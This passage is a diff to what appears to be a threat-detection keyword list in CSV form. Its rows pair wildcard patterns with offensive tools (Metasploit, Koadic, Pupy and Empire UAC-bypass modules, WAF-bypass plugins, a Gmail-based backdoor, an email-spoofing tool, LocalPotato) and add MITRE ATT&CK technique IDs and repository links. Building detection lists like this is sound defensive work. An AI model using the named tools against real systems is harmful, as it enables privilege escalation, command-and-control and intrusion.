posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection_winsxs.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_registry.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*bypassuac_sdclt*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bypassuac_silentcleanup.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bypassuac_silentcleanup.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypassuac_slui*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bypassuac_sluihijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bypassuac_sluihijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypassuac_systempropertiesadvanced*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bypassuac_token_imp.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*bypassuac_vbs.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_windows_store_reg.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bypassuac_token_imp.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*bypassuac_vbs.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_windows_store_reg.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypassuac_wsreset*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*BypassUACTokenManipulation*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*bypassuac-x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac-x64.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac-x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac-x86.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*BypassUACTokenManipulation*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*bypassuac-x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x64.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x86.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypasswaf.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*bypasswaf.jar*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" "*bypasswaf.py*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" @@ -8146,7 +8293,7 @@ "*byt3bl33d3r/gcat*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*byt3bl33d3r/ItWasAllADream*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*byt3bl33d3r/pth-toolkit*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*byt3bl33d3r/SpamChannel*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","256","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" +"*byt3bl33d3r/SpamChannel*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" "*-c /tmp/redsocks.conf*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*-c 854A20FB-2D44-457D-992F-EF13785D2B51*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*-c BOF.cpp -o BOF.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 